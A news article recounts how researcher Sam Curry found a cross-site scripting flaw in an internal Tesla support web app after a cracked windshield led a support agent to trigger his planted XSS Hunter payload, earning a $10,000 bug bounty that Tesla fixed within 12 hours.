Huge rock, cracked windshield helps hacker land a $10k Tesla security bug

No one wants expensive repairs after a rock pierces your car’s windshield, but for one security researcher, a “huge rock” that cracked his Tesla's windscreen lead him to a security flaw worth $10,000. 

Web application security researcher Sam Curry said he earned a $10,000 reward from Tesla’s bug bounty program over his discovery, courtesy of a cracked windshield, which can cost $1,000 or more to replace. 

The reward is at the higher end of Tesla’s bug bounty program, which has gradually offered greater rewards, starting at a $1,000 limit in 2014 that last year was upped to $15,000.

Curry bought a Tesla Model 3 and earlier this year started trying to hack it, focusing initially on Tesla’s custom web browser from its infotainment system, which had bugs that earned two hackers an actual Model 3 last year. The browser was an obvious place to start but didn’t produce any results.   

Curry said he wasn’t able to get the browser “to do anything even remotely interesting”, and had almost given up hacking his own Tesla Model 3, but forgot that before April he’d set up an automated attack on his own vehicle using an open source tool called ‘XSS Hunter’ that is designed to exploit cross-site scripting (XSS) flaws in a web app if one ever becomes apparent.

But one month ago, like a grasshopper drawn to a vehicle's headlights, a “huge rock” slammed into Curry's Tesla and cracked the windshield. What could normally be an expensive incident helped him uncover a $10,000 software bug he’d just been fishing for. 

The cracked windscreen lead Curry to a URL he hadn’t thought of prior to him needing support from Tesla due to the crack. The page appears to be part of a web app that Tesla engineers use internally to communicate with customer vehicles. 

“One of the agents responding to my cracked windshield fired my XSS hunter payload from within the context of the “garage.vn.teslamotors.com” domain,” Curry wrote, referring to the URL that pushed the browser to a vulnerable URL. 

That particular page was a serious issue and could have allowed someone with different motives to potentially see “vital” vehicle statistics of many Tesla owners simply by adding an extra character to the vehicle identifier number in the URL. 

Information included in the XSS Hunter snapshot Curry received included his vehicle’s “speed, temperature, version number, tire pressure, whether it was locked, alerts, and many more little tidbits of information.”

There were also details about his vehicle’s “firmware, CAN viewers, geofence locations, configurations, and code-names for Tesla software features.” CAN refers to Controller Area Network and is a core part of many modern vehicles that hackers have targeted in the past.   

According to Curry, Tesla pushed out a fix within 12 hours of his first bug report and he subsequently couldn’t use the same bug to exploit the flaw.